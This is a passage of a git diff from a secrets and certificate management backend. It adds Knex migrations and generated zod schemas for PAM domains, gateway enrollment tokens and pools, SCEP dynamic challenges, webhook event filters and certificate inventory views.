+ if (await knex.schema.hasTable(TableName.PamResource)) { + const hasAdServerResourceId = await knex.schema.hasColumn(TableName.PamResource, "adServerResourceId"); + if (hasAdServerResourceId) { + await knex.schema.alterTable(TableName.PamResource, (t) => { + t.dropColumn("adServerResourceId"); + }); + } + } +} + +export async function down(knex: Knex): Promise { + if (await knex.schema.hasTable(TableName.PamResource)) { + const hasAdServerResourceId = await knex.schema.hasColumn(TableName.PamResource, "adServerResourceId"); + if (!hasAdServerResourceId) { + await knex.schema.alterTable(TableName.PamResource, (t) => { + t.uuid("adServerResourceId").nullable(); + t.foreign("adServerResourceId").references("id").inTable(TableName.PamResource).onDelete("SET NULL"); + }); + } + } + + if (await knex.schema.hasTable(TableName.PamDomain)) { + const domains = await knex(TableName.PamDomain).where("domainType", "active-directory").select("*"); + + for (const domain of domains) { + await knex(TableName.PamResource).insert({ + id: domain.id, + projectId: domain.projectId, + name: domain.name, + resourceType: "active-directory", + gatewayId: domain.gatewayId, + encryptedConnectionDetails: domain.encryptedConnectionDetails, + discoveryFingerprint: domain.discoveryFingerprint + } as any); + + await knex(TableName.PamAccount) + .where("domainId", domain.id) + .update({ + resourceId: domain.id, + domainId: null + } as any); + + await knex(TableName.PamResource) + .where("domainId", domain.id) + .update({ + adServerResourceId: domain.id, + domainId: null + } as any); + + await knex(TableName.ResourceMetadata) + .where("pamDomainId", domain.id) + .update({ + pamResourceId: domain.id, + pamDomainId: null + } as any); + + await knex(TableName.PamDomain).where("id", domain.id).delete(); + } + } + + await knex.raw(`ALTER TABLE ${TableName.PamAccount} DROP CONSTRAINT IF EXISTS chk_pam_account_parent`); + + if (await knex.schema.hasTable(TableName.PamAccount)) { + const hasDomainId = await knex.schema.hasColumn(TableName.PamAccount, "domainId"); + if (hasDomainId) { + await knex.schema.alterTable(TableName.PamAccount, (t) => { + t.uuid("resourceId").notNullable().alter(); + t.dropColumn("domainId"); + }); + } + } + + if (await knex.schema.hasTable(TableName.ResourceMetadata)) { + const hasPamDomainId = await knex.schema.hasColumn(TableName.ResourceMetadata, "pamDomainId"); + if (hasPamDomainId) { + await knex.schema.alterTable(TableName.ResourceMetadata, (t) => { + t.dropColumn("pamDomainId"); + }); + } + } + + if (await knex.schema.hasTable(TableName.PamResource)) { + const hasDomainId = await knex.schema.hasColumn(TableName.PamResource, "domainId"); + if (hasDomainId) { + await knex.schema.alterTable(TableName.PamResource, (t) => { + t.dropColumn("domainId"); + }); + } + } + + await dropOnUpdateTrigger(knex, TableName.PamDomain); + await knex.schema.dropTableIfExists(TableName.PamDomain); +} diff --git a/backend/src/db/migrations/20260409120000_add-webhook-event-toggles.ts b/backend/src/db/migrations/20260409120000_add-webhook-event-toggles.ts new file mode 100644 index 00000000000..f6fcae82232 --- /dev/null +++ b/backend/src/db/migrations/20260409120000_add-webhook-event-toggles.ts @@ -0,0 +1,31 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; + +const FILTERED_EVENTS_COLUMN = "filteredEvents"; + +export async function up(knex: Knex): Promise { + const hasWebhookTable = await knex.schema.hasTable(TableName.Webhook); + if (!hasWebhookTable) return; + + const hasFilteredEventsColumn = await knex.schema.hasColumn(TableName.Webhook, FILTERED_EVENTS_COLUMN); + + await knex.schema.alterTable(TableName.Webhook, (table) => { + if (!hasFilteredEventsColumn) { + table.specificType(FILTERED_EVENTS_COLUMN, "text[]").nullable(); + } + }); +} + +export async function down(knex: Knex): Promise { + const hasWebhookTable = await knex.schema.hasTable(TableName.Webhook); + if (!hasWebhookTable) return; + + const hasFilteredEventsColumn = await knex.schema.hasColumn(TableName.Webhook, FILTERED_EVENTS_COLUMN); + + await knex.schema.alterTable(TableName.Webhook, (table) => { + if (hasFilteredEventsColumn) { + table.dropColumn(FILTERED_EVENTS_COLUMN); + } + }); +} diff --git a/backend/src/db/migrations/20260413000001_gateway-enrollment-tokens.ts b/backend/src/db/migrations/20260413000001_gateway-enrollment-tokens.ts new file mode 100644 index 00000000000..375a3e5a782 --- /dev/null +++ b/backend/src/db/migrations/20260413000001_gateway-enrollment-tokens.ts @@ -0,0 +1,48 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; +import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; + +export async function up(knex: Knex): Promise { + const hasTokenVersionColumn = await knex.schema.hasColumn(TableName.GatewayV2, "tokenVersion"); + const hasIdentityIdColumn = await knex.schema.hasColumn(TableName.GatewayV2, "identityId"); + + // Make identityId nullable and add tokenVersion to support enrollment-token-based gateways + await knex.schema.alterTable(TableName.GatewayV2, (t) => { + if (hasIdentityIdColumn) { + t.uuid("identityId").nullable().alter(); + } + if (!hasTokenVersionColumn) { + t.integer("tokenVersion").notNullable().defaultTo(0); + } + }); + + if (!(await knex.schema.hasTable(TableName.GatewayEnrollmentTokens))) { + await knex.schema.createTable(TableName.GatewayEnrollmentTokens, (t) => { + t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); + t.uuid("orgId").notNullable(); + t.foreign("orgId").references("id").inTable(TableName.Organization).onDelete("CASCADE"); + t.string("tokenHash", 128).notNullable().unique(); + t.integer("ttl").notNullable().defaultTo(3600); + t.timestamp("expiresAt").notNullable(); + t.timestamp("usedAt").nullable(); + // When set, enrolling with this token updates the existing gateway instead of creating a new one + t.uuid("gatewayId").nullable(); + t.foreign("gatewayId").references("id").inTable(TableName.GatewayV2).onDelete("CASCADE"); + t.timestamps(true, true, true); + }); + + await createOnUpdateTrigger(knex, TableName.GatewayEnrollmentTokens); + } +} + +export async function down(knex: Knex): Promise { + await dropOnUpdateTrigger(knex, TableName.GatewayEnrollmentTokens); + await knex.schema.dropTableIfExists(TableName.GatewayEnrollmentTokens); + + // Restore identityId to not-null and remove tokenVersion (only safe if no null rows exist) + await knex.schema.alterTable(TableName.GatewayV2, (t) => { + t.uuid("identityId").notNullable().alter(); + t.dropColumn("tokenVersion"); + }); +} diff --git a/backend/src/db/migrations/20260413325231_add-scep-dynamic-challenges.ts b/backend/src/db/migrations/20260413325231_add-scep-dynamic-challenges.ts new file mode 100644 index 00000000000..64185f31ee4 --- /dev/null +++ b/backend/src/db/migrations/20260413325231_add-scep-dynamic-challenges.ts @@ -0,0 +1,63 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; +import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; + +export async function up(knex: Knex): Promise { + if (!(await knex.schema.hasTable(TableName.PkiScepDynamicChallenge))) { + await knex.schema.createTable(TableName.PkiScepDynamicChallenge, (t) => { + t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); + + t.uuid("scepConfigId").notNullable(); + t.foreign("scepConfigId").references("id").inTable(TableName.PkiScepEnrollmentConfig).onDelete("CASCADE"); + t.index("scepConfigId"); + + t.string("hashedChallenge", 64).notNullable(); + t.index("hashedChallenge"); + + t.timestamp("expiresAt").notNullable(); + t.index("expiresAt"); + + t.timestamps(true, true, true); + }); + + await createOnUpdateTrigger(knex, TableName.PkiScepDynamicChallenge); + } + + if (!(await knex.schema.hasColumn(TableName.PkiScepEnrollmentConfig, "challengeType"))) { + await knex.schema.alterTable(TableName.PkiScepEnrollmentConfig, (t) => { + t.string("challengeType", 32).notNullable().defaultTo("static"); + t.integer("dynamicChallengeExpiryMinutes").nullable(); + t.integer("dynamicChallengeMaxPending").nullable(); + }); + } + + if (await knex.schema.hasColumn(TableName.PkiScepEnrollmentConfig, "hashedChallengePassword")) { + await knex.schema.alterTable(TableName.PkiScepEnrollmentConfig, (t) => { + t.text("hashedChallengePassword").nullable().alter(); + }); + } +} + +export async function down(knex: Knex): Promise { + if (await knex.schema.hasTable(TableName.PkiScepDynamicChallenge)) { + await dropOnUpdateTrigger(knex, TableName.PkiScepDynamicChallenge); + await knex.schema.dropTable(TableName.PkiScepDynamicChallenge); + } + + if (await knex.schema.hasColumn(TableName.PkiScepEnrollmentConfig, "challengeType")) { + await knex.schema.alterTable(TableName.PkiScepEnrollmentConfig, (t) => { + t.dropColumn("challengeType"); + t.dropColumn("dynamicChallengeExpiryMinutes"); + t.dropColumn("dynamicChallengeMaxPending"); + }); + } + + if (await knex.schema.hasColumn(TableName.PkiScepEnrollmentConfig, "hashedChallengePassword")) { + await knex(TableName.PkiScepEnrollmentConfig).whereNull("hashedChallengePassword").delete(); + + await knex.schema.alterTable(TableName.PkiScepEnrollmentConfig, (t) => { + t.text("hashedChallengePassword").notNullable().alter(); + }); + } +} diff --git a/backend/src/db/migrations/20260414000001_add-gateway-pools.ts b/backend/src/db/migrations/20260414000001_add-gateway-pools.ts new file mode 100644 index 00000000000..7bb9797b52c --- /dev/null +++ b/backend/src/db/migrations/20260414000001_add-gateway-pools.ts @@ -0,0 +1,60 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; +import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; + +export async function up(knex: Knex): Promise { + // Create gateway_pools table + if (!(await knex.schema.hasTable(TableName.GatewayPool))) { + await knex.schema.createTable(TableName.GatewayPool, (t) => { + t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); + t.uuid("orgId").notNullable(); + t.foreign("orgId").references("id").inTable(TableName.Organization).onDelete("CASCADE"); + t.string("name", 32).notNullable(); + t.timestamps(true, true, true); + t.unique(["orgId", "name"]); + }); + + await createOnUpdateTrigger(knex, TableName.GatewayPool); + } + + // Create gateway_pool_memberships join table + if (!(await knex.schema.hasTable(TableName.GatewayPoolMembership))) { + await knex.schema.createTable(TableName.GatewayPoolMembership, (t) => { + t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); + t.uuid("gatewayPoolId").notNullable(); + t.foreign("gatewayPoolId").references("id").inTable(TableName.GatewayPool).onDelete("CASCADE"); + t.uuid("gatewayId").notNullable(); + t.foreign("gatewayId").references("id").inTable(TableName.GatewayV2).onDelete("CASCADE"); + t.timestamps(true, true, true); + t.unique(["gatewayPoolId", "gatewayId"]); + }); + + await createOnUpdateTrigger(knex, TableName.GatewayPoolMembership); + } + + // Add gatewayPoolId to identity_kubernetes_auths + const hasGatewayPoolId = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "gatewayPoolId"); + if (!hasGatewayPoolId) { + await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (t) => { + t.uuid("gatewayPoolId").nullable(); + t.foreign("gatewayPoolId").references("id").inTable(TableName.GatewayPool).onDelete("RESTRICT"); + }); + } +} + +export async function down(knex: Knex): Promise { + // Remove gatewayPoolId from identity_kubernetes_auths + const hasGatewayPoolId = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "gatewayPoolId"); + if (hasGatewayPoolId) { + await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (t) => { + t.dropColumn("gatewayPoolId"); + }); + } + + await dropOnUpdateTrigger(knex, TableName.GatewayPoolMembership); + await knex.schema.dropTableIfExists(TableName.GatewayPoolMembership); + + await dropOnUpdateTrigger(knex, TableName.GatewayPool); + await knex.schema.dropTableIfExists(TableName.GatewayPool); +} diff --git a/backend/src/db/migrations/20260415122043_add-shared-to-certificate-inventory-views.ts b/backend/src/db/migrations/20260415122043_add-shared-to-certificate-inventory-views.ts new file mode 100644 index 00000000000..3373a9533d3 --- /dev/null +++ b/backend/src/db/migrations/20260415122043_add-shared-to-certificate-inventory-views.ts @@ -0,0 +1,47 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; + +export async function up(knex: Knex): Promise { + const hasTable = await knex.schema.hasTable(TableName.CertificateInventoryView); + if (!hasTable) return; + + const hasColumn = await knex.schema.hasColumn(TableName.CertificateInventoryView, "isShared"); + if (hasColumn) return; + + await knex.schema.alterTable(TableName.CertificateInventoryView, (t) => { + t.boolean("isShared").notNullable().defaultTo(false); + }); + + await knex.schema.alterTable(TableName.CertificateInventoryView, (t) => { + t.dropUnique(["projectId", "name", "createdByUserId"]); + }); + + await knex.raw( + `CREATE UNIQUE INDEX "cert_inv_view_personal_unique" ON "${TableName.CertificateInventoryView}" ("projectId", "name", "createdByUserId") WHERE "isShared" = false` + ); + + // Shared views: name must be unique per project + await knex.raw( + `CREATE UNIQUE INDEX "cert_inv_view_shared_unique" ON "${TableName.CertificateInventoryView}" ("projectId", "name") WHERE "isShared" = true` + ); +} + +export async function down(knex: Knex): Promise { + const hasTable = await knex.schema.hasTable(TableName.CertificateInventoryView); + if (!hasTable) return; + + const hasColumn = await knex.schema.hasColumn(TableName.CertificateInventoryView, "isShared"); + if (!hasColumn) return; + + await knex.raw(`DROP INDEX IF EXISTS "cert_inv_view_personal_unique"`); + await knex.raw(`DROP INDEX IF EXISTS "cert_inv_view_shared_unique"`); + + await knex.schema.alterTable(TableName.CertificateInventoryView, (t) => { + t.unique(["projectId", "name", "createdByUserId"]); + }); + + await knex.schema.alterTable(TableName.CertificateInventoryView, (t) => { + t.dropColumn("isShared"); + }); +} diff --git a/backend/src/db/migrations/20260416231234_add-external-metadata-to-certificates.ts b/backend/src/db/migrations/20260416231234_add-external-metadata-to-certificates.ts new file mode 100644 index 00000000000..568d30f90d0 --- /dev/null +++ b/backend/src/db/migrations/20260416231234_add-external-metadata-to-certificates.ts @@ -0,0 +1,24 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; + +export async function up(knex: Knex): Promise { + if (await knex.schema.hasTable(TableName.Certificate)) { + const hasColumn = await knex.schema.hasColumn(TableName.Certificate, "externalMetadata"); + if (!hasColumn) { + await knex.schema.alterTable(TableName.Certificate, (t) => { + t.jsonb("externalMetadata").nullable(); + }); + } + } +} + +export async function down(knex: Knex): Promise { + if (await knex.schema.hasTable(TableName.Certificate)) { + if (await knex.schema.hasColumn(TableName.Certificate, "externalMetadata")) { + await knex.schema.alterTable(TableName.Certificate, (t) => { + t.dropColumn("externalMetadata"); + }); + } + } +} diff --git a/backend/src/db/migrations/20260417245211_pam-session-reason.ts b/backend/src/db/migrations/20260417245211_pam-session-reason.ts new file mode 100644 index 00000000000..85c4d31f20e --- /dev/null +++ b/backend/src/db/migrations/20260417245211_pam-session-reason.ts @@ -0,0 +1,25 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; + +export async function up(knex: Knex): Promise { + if (await knex.schema.hasTable(TableName.PamSession)) { + const hasCol = await knex.schema.hasColumn(TableName.PamSession, "reason"); + if (!hasCol) { + await knex.schema.alterTable(TableName.PamSession, (t) => { + t.string("reason", 1000).nullable(); + }); + } + } +} + +export async function down(knex: Knex): Promise { + if (await knex.schema.hasTable(TableName.PamSession)) { + const hasCol = await knex.schema.hasColumn(TableName.PamSession, "reason"); + if (hasCol) { + await knex.schema.alterTable(TableName.PamSession, (t) => { + t.dropColumn("reason"); + }); + } + } +} diff --git a/backend/src/db/migrations/20260421135044_add-digicert-external-ca-columns.ts b/backend/src/db/migrations/20260421135044_add-digicert-external-ca-columns.ts new file mode 100644 index 00000000000..5df39806ccb --- /dev/null +++ b/backend/src/db/migrations/20260421135044_add-digicert-external-ca-columns.ts @@ -0,0 +1,27 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; + +export async function up(knex: Knex): Promise { + const hasCertificateRequests = await knex.schema.hasTable(TableName.CertificateRequests); + if (hasCertificateRequests) { + const hasEncryptedPrivateKey = await knex.schema.hasColumn(TableName.CertificateRequests, "encryptedPrivateKey"); + if (!hasEncryptedPrivateKey) { + await knex.schema.alterTable(TableName.CertificateRequests, (t) => { + t.binary("encryptedPrivateKey").nullable(); + }); + } + } +} + +export async function down(knex: Knex): Promise { + const hasCertificateRequests = await knex.schema.hasTable(TableName.CertificateRequests); + if (hasCertificateRequests) { + const hasEncryptedPrivateKey = await knex.schema.hasColumn(TableName.CertificateRequests, "encryptedPrivateKey"); + if (hasEncryptedPrivateKey) { + await knex.schema.alterTable(TableName.CertificateRequests, (t) => { + t.dropColumn("encryptedPrivateKey"); + }); + } + } +} diff --git a/backend/src/db/schemas/certificate-inventory-views.ts b/backend/src/db/schemas/certificate-inventory-views.ts new file mode 100644 index 00000000000..d500d35bb62 --- /dev/null +++ b/backend/src/db/schemas/certificate-inventory-views.ts @@ -0,0 +1,26 @@ +// Code generated by automation script, DO NOT EDIT. +// Automated by pulling database and generating zod schema +// To update. Just run npm run generate:schema +// Written by akhilmhdh. + +import { z } from "zod"; + +import { TImmutableDBKeys } from "./models"; + +export const CertificateInventoryViewsSchema = z.object({ + id: z.string().uuid(), + projectId: z.string(), + name: z.string(), + filters: z.unknown(), + columns: z.unknown().nullable().optional(), + createdByUserId: z.string().uuid().nullable().optional(), + createdAt: z.date(), + updatedAt: z.date(), + isShared: z.boolean().default(false) +}); + +export type TCertificateInventoryViews = z.infer; +export type TCertificateInventoryViewsInsert = Omit, TImmutableDBKeys>; +export type TCertificateInventoryViewsUpdate = Partial< + Omit, TImmutableDBKeys> +>; diff --git a/backend/src/db/schemas/certificate-requests.ts b/backend/src/db/schemas/certificate-requests.ts index a1bae9640c5..b059afbd54e 100644 --- a/backend/src/db/schemas/certificate-requests.ts +++ b/backend/src/db/schemas/certificate-requests.ts @@ -5,6 +5,8 @@ import { z } from "zod"; +import { zodBuffer } from "@app/lib/zod"; + import { TImmutableDBKeys } from "./models"; export const CertificateRequestsSchema = z.object({ @@ -36,7 +38,8 @@ export const CertificateRequestsSchema = z.object({ organizationalUnit: z.string().nullable().optional(), country: z.string().nullable().optional(), state: z.string().nullable().optional(), - locality: z.string().nullable().optional() + locality: z.string().nullable().optional(), + encryptedPrivateKey: zodBuffer.nullable().optional() }); export type TCertificateRequests = z.infer; diff --git a/backend/src/db/schemas/certificates.ts b/backend/src/db/schemas/certificates.ts index 68325058faf..b69adb06017 100644 --- a/backend/src/db/schemas/certificates.ts +++ b/backend/src/db/schemas/certificates.ts @@ -44,7 +44,8 @@ export const CertificatesSchema = z.object({ isCA: z.boolean().nullable().optional(), pathLength: z.number().nullable().optional(), source: z.string().nullable().optional(), - discoveryMetadata: z.unknown().nullable().optional() + discoveryMetadata: z.unknown().nullable().optional(), + externalMetadata: z.unknown().nullable().optional() }); export type TCertificates = z.infer; diff --git a/backend/src/db/schemas/external-migration-configs.ts b/backend/src/db/schemas/external-migration-configs.ts new file mode 100644 index 00000000000..bd77923b225 --- /dev/null +++ b/backend/src/db/schemas/external-migration-configs.ts @@ -0,0 +1,26 @@ +// Code generated by automation script, DO NOT EDIT. +// Automated by pulling database and generating zod schema +// To update. Just run npm run generate:schema +// Written by akhilmhdh. + +import { z } from "zod"; + +import { zodBuffer } from "@app/lib/zod"; + +import { TImmutableDBKeys } from "./models"; + +export const ExternalMigrationConfigsSchema = z.object({ + id: z.string().uuid(), + orgId: z.string().uuid(), + provider: z.string(), + encryptedConfig: zodBuffer, + connectionId: z.string().uuid().nullable().optional(), + createdAt: z.date(), + updatedAt: z.date() +}); + +export type TExternalMigrationConfigs = z.infer; +export type TExternalMigrationConfigsInsert = Omit, TImmutableDBKeys>; +export type TExternalMigrationConfigsUpdate = Partial< + Omit, TImmutableDBKeys> +>; diff --git a/backend/src/db/schemas/gateway-enrollment-tokens.ts b/backend/src/db/schemas/gateway-enrollment-tokens.ts new file mode 100644 index 00000000000..99cc5ebfd67 --- /dev/null +++ b/backend/src/db/schemas/gateway-enrollment-tokens.ts @@ -0,0 +1,26 @@ +// Code generated by automation script, DO NOT EDIT. +// Automated by pulling database and generating zod schema +// To update. Just run npm run generate:schema +// Written by akhilmhdh. + +import { z } from "zod"; + +import { TImmutableDBKeys } from "./models"; + +export const GatewayEnrollmentTokensSchema = z.object({ + id: z.string().uuid(), + orgId: z.string().uuid(), + tokenHash: z.string(), + ttl: z.number().default(3600), + expiresAt: z.date(), + usedAt: z.date().nullable().optional(), + gatewayId: z.string().uuid().nullable().optional(), + createdAt: z.date(), + updatedAt: z.date() +}); + +export type TGatewayEnrollmentTokens = z.infer; +export type TGatewayEnrollmentTokensInsert = Omit, TImmutableDBKeys>; +export type TGatewayEnrollmentTokensUpdate = Partial< + Omit, TImmutableDBKeys> +>; diff --git a/backend/src/db/schemas/gateway-pool-memberships.ts b/backend/src/db/schemas/gateway-pool-memberships.ts new file mode 100644 index 00000000000..53b636ca728 --- /dev/null +++ b/backend/src/db/schemas/gateway-pool-memberships.ts @@ -0,0 +1,22 @@ +// Code generated by automation script, DO NOT EDIT. +// Automated by pulling database and generating zod schema +// To update. Just run npm run generate:schema +// Written by akhilmhdh. + +import { z } from "zod"; + +import { TImmutableDBKeys } from "./models"; + +export const GatewayPoolMembershipsSchema = z.object({ + id: z.string().uuid(), + gatewayPoolId: z.string().uuid(), + gatewayId: z.string().uuid(), + createdAt: z.date(), + updatedAt: z.date() +}); + +export type TGatewayPoolMemberships = z.infer; +export type TGatewayPoolMembershipsInsert = Omit, TImmutableDBKeys>; +export type TGatewayPoolMembershipsUpdate = Partial< + Omit, TImmutableDBKeys> +>; diff --git a/backend/src/db/schemas/gateway-pools.ts b/backend/src/db/schemas/gateway-pools.ts new file mode 100644 index 00000000000..8da7e271a5e --- /dev/null +++ b/backend/src/db/schemas/gateway-pools.ts @@ -0,0 +1,20 @@ +// Code generated by automation script, DO NOT EDIT. +// Automated by pulling database and generating zod schema +// To update. Just run npm run generate:schema +// Written by akhilmhdh. + +import { z } from "zod"; + +import { TImmutableDBKeys } from "./models"; + +export const GatewayPoolsSchema = z.object({ + id: z.string().uuid(), + orgId: z.string().uuid(), + name: z.string(), + createdAt: z.date(), + updatedAt: z.date() +}); + +export type TGatewayPools = z.infer; +export type TGatewayPoolsInsert = Omit, TImmutableDBKeys>; +export type TGatewayPoolsUpdate = Partial, TImmutableDBKeys>>; diff --git a/backend/src/db/schemas/gateways-v2.ts b/backend/src/db/schemas/gateways-v2.ts index a133fa2acec..aa286fe5875 100644 --- a/backend/src/db/schemas/gateways-v2.ts +++ b/backend/src/db/schemas/gateways-v2.ts @@ -14,13 +14,14 @@ export const GatewaysV2Schema = z.object({ createdAt: z.date(), updatedAt: z.date(), orgId: z.string().uuid(), - identityId: z.string().uuid(), + identityId: z.string().uuid().nullable().optional(), relayId: z.string().uuid().nullable().optional(), name: z.string(), heartbeat: z.date().nullable().optional(), encryptedPamSessionKey: zodBuffer.nullable().optional(), healthAlertedAt: z.date().nullable().optional(), - lastHealthCheckStatus: z.string().nullable().optional() + lastHealthCheckStatus: z.string().nullable().optional(), + tokenVersion: z.number().default(0) }); export type TGatewaysV2 = z.infer; diff --git a/backend/src/db/schemas/identity-kubernetes-auths.ts b/backend/src/db/schemas/identity-kubernetes-auths.ts index 4789ef36593..e9cfe9c4b04 100644 --- a/backend/src/db/schemas/identity-kubernetes-auths.ts +++ b/backend/src/db/schemas/identity-kubernetes-auths.ts @@ -33,7 +33,8 @@ export const IdentityKubernetesAuthsSchema = z.object({ gatewayId: z.string().uuid().nullable().optional(), accessTokenPeriod: z.coerce.number().default(0), tokenReviewMode: z.string().default("api"), - gatewayV2Id: z.string().uuid().nullable().optional() + gatewayV2Id: z.string().uuid().nullable().optional(), + gatewayPoolId: z.string().uuid().nullable().optional() }); export type TIdentityKubernetesAuths = z.infer; diff --git a/backend/src/db/schemas/index.ts b/backend/src/db/schemas/index.ts index 448b992de4a..8ac69fffb7e 100644 --- a/backend/src/db/schemas/index.ts +++ b/backend/src/db/schemas/index.ts @@ -11,7 +11,6 @@ export * from "./ai-mcp-endpoints"; export * from "./ai-mcp-server-tools"; export * from "./ai-mcp-server-user-credentials"; export * from "./ai-mcp-servers"; -export * from "./api-keys"; export * from "./app-connection-credential-rotations"; export * from "./app-connections"; export * from "./approval-policies"; @@ -34,6 +33,7 @@ export * from "./certificate-authority-crl"; export * from "./certificate-authority-secret"; export * from "./certificate-bodies"; export * from "./certificate-cleanup-configs"; +export * from "./certificate-inventory-views"; export * from "./certificate-requests"; export * from "./certificate-secrets"; export * from "./certificate-syncs"; @@ -46,12 +46,16 @@ export * from "./email-domains"; export * from "./external-certificate-authorities"; export * from "./external-group-org-role-mappings"; export * from "./external-kms"; +export * from "./external-migration-configs"; export * from "./folder-checkpoint-resources"; export * from "./folder-checkpoints"; export * from "./folder-commit-changes"; export * from "./folder-commits"; export * from "./folder-tree-checkpoint-resources"; export * from "./folder-tree-checkpoints"; +export * from "./gateway-enrollment-tokens"; +export * from "./gateway-pool-memberships"; +export * from "./gateway-pools"; export * from "./gateways"; export * from "./gateways-v2"; export * from "./git-app-install-sessions"; @@ -118,6 +122,7 @@ export * from "./pam-discovery-source-dependencies"; export * from "./pam-discovery-source-resources"; export * from "./pam-discovery-source-runs"; export * from "./pam-discovery-sources"; +export * from "./pam-domains"; export * from "./pam-folders"; export * from "./pam-resource-favorites"; export * from "./pam-resource-rotation-rules"; @@ -147,6 +152,7 @@ export * from "./pki-discovery-configs"; export * from "./pki-discovery-installations"; export * from "./pki-discovery-scan-history"; export * from "./pki-est-enrollment-configs"; +export * from "./pki-scep-dynamic-challenges"; export * from "./pki-scep-enrollment-configs"; export * from "./pki-scep-transactions"; export * from "./pki-signers"; @@ -191,10 +197,7 @@ export * from "./secret-folders"; export * from "./secret-imports"; export * from "./secret-references"; export * from "./secret-references-v2"; -export * from "./secret-rotation-output-v2"; -export * from "./secret-rotation-outputs"; export * from "./secret-rotation-v2-secret-mappings"; -export * from "./secret-rotations"; export * from "./secret-rotations-v2"; export * from "./secret-scanning-configs"; export * from "./secret-scanning-data-sources"; diff --git a/backend/src/db/schemas/models.ts b/backend/src/db/schemas/models.ts index 898a347a45c..5eec2ab6be8 100644 --- a/backend/src/db/schemas/models.ts +++ b/backend/src/db/schemas/models.ts @@ -33,6 +33,7 @@ export enum TableName { PkiAcmeEnrollmentConfig = "pki_acme_enrollment_configs", PkiScepEnrollmentConfig = "pki_scep_enrollment_configs", PkiScepTransaction = "pki_scep_transactions", + PkiScepDynamicChallenge = "pki_scep_dynamic_challenges", PkiSubscriber = "pki_subscribers", PkiAlert = "pki_alerts", PkiAlertsV2 = "pki_alerts_v2", @@ -60,7 +61,6 @@ export enum TableName { UserAction = "user_actions", SuperAdmin = "super_admin", RateLimit = "rate_limit", - ApiKey = "api_keys", ProjectSshConfig = "project_ssh_configs", Project = "projects", ProjectBot = "project_bots", @@ -130,8 +130,6 @@ export enum TableName { SecretApprovalRequestSecret = "secret_approval_requests_secrets", SecretApprovalRequestSecretTag = "secret_approval_request_secret_tags", SecretApprovalPolicyEnvironment = "secret_approval_policies_environments", - SecretRotation = "secret_rotations", - SecretRotationOutput = "secret_rotation_outputs", SamlConfig = "saml_configs", LdapConfig = "ldap_configs", OidcConfig = "oidc_configs", @@ -162,7 +160,6 @@ export enum TableName { JnSecretTag = "secret_tag_junction", SecretVersionTag = "secret_version_tag_junction", SecretVersionV2Tag = "secret_version_v2_tag_junction", - SecretRotationOutputV2 = "secret_rotation_output_v2", // KMS Service KmsServerRootConfig = "kms_root_config", KmsKey = "kms_keys", @@ -220,6 +217,9 @@ export enum TableName { OrgGatewayConfigV2 = "org_gateway_config_v2", Relay = "relays", GatewayV2 = "gateways_v2", + GatewayEnrollmentTokens = "gateway_enrollment_tokens", + GatewayPool = "gateway_pools", + GatewayPoolMembership = "gateway_pool_memberships", KeyValueStore = "key_value_store", @@ -237,9 +237,11 @@ export enum TableName { PamAccountDependency = "pam_account_dependencies", PamResourceRotationRule = "pam_resource_rotation_rules", PamResourceFavorite = "pam_resource_favorites", + PamDomain = "pam_domains", PamAccountPolicy = "pam_account_policies", VaultExternalMigrationConfig = "vault_external_migration_configs", + ExternalMigrationConfig = "external_migration_configs", // PKI ACME PkiAcmeAccount = "pki_acme_accounts", @@ -258,6 +260,9 @@ export enum TableName { // PKI Cleanup CertificateCleanupConfig = "certificate_cleanup_configs", + // PKI Inventory Views + CertificateInventoryView = "certificate_inventory_views", + // AI AiMcpServer = "ai_mcp_servers", AiMcpServerTool = "ai_mcp_server_tools", @@ -281,11 +286,15 @@ export enum TableName { PkiSigners = "pki_signers", PkiSigningOperations = "pki_signing_operations", + CaSigningConfig = "ca_signing_configs", + SecretValidationRule = "secret_validation_rules", + // Deprecated - Not used anymore now that Redis is persistent DeprecatedDurableQueueJobs = "queue_jobs", - - CaSigningConfig = "ca_signing_configs", - SecretValidationRule = "secret_validation_rules" + DeprecatedSecretRotationV1 = "secret_rotations", + DeprecatedSecretRotationOutput = "secret_rotation_outputs", + DeprecatedSecretRotationOutputV2 = "secret_rotation_output_v2", + DeprecatedApiKey = "api_keys" } export type TImmutableDBKeys = "id" | "createdAt" | "updatedAt" | "commitId"; diff --git a/backend/src/db/schemas/pam-accounts.ts b/backend/src/db/schemas/pam-accounts.ts index b84f31743b1..8402e7b1d5f 100644 --- a/backend/src/db/schemas/pam-accounts.ts +++ b/backend/src/db/schemas/pam-accounts.ts @@ -13,7 +13,7 @@ export const PamAccountsSchema = z.object({ id: z.string().uuid(), projectId: z.string(), folderId: z.string().uuid().nullable().optional(), - resourceId: z.string().uuid(), + resourceId: z.string().uuid().nullable().optional(), name: z.string(), description: z.string().nullable().optional(), encryptedCredentials: zodBuffer, @@ -25,7 +25,8 @@ export const PamAccountsSchema = z.object({ requireMfa: z.boolean().default(false).nullable().optional(), internalMetadata: z.unknown().nullable().optional(), discoveryFingerprint: z.string().nullable().optional(), - policyId: z.string().uuid().nullable().optional() + policyId: z.string().uuid().nullable().optional(), + domainId: z.string().uuid().nullable().optional() }); export type TPamAccounts = z.infer; diff --git a/backend/src/db/schemas/pam-domains.ts b/backend/src/db/schemas/pam-domains.ts new file mode 100644 index 00000000000..da1a63a99e9 --- /dev/null +++ b/backend/src/db/schemas/pam-domains.ts @@ -0,0 +1,26 @@ +// Code generated by automation script, DO NOT EDIT. +// Automated by pulling database and generating zod schema +// To update. Just run npm run generate:schema +// Written by akhilmhdh. + +import { z } from "zod"; + +import { zodBuffer } from 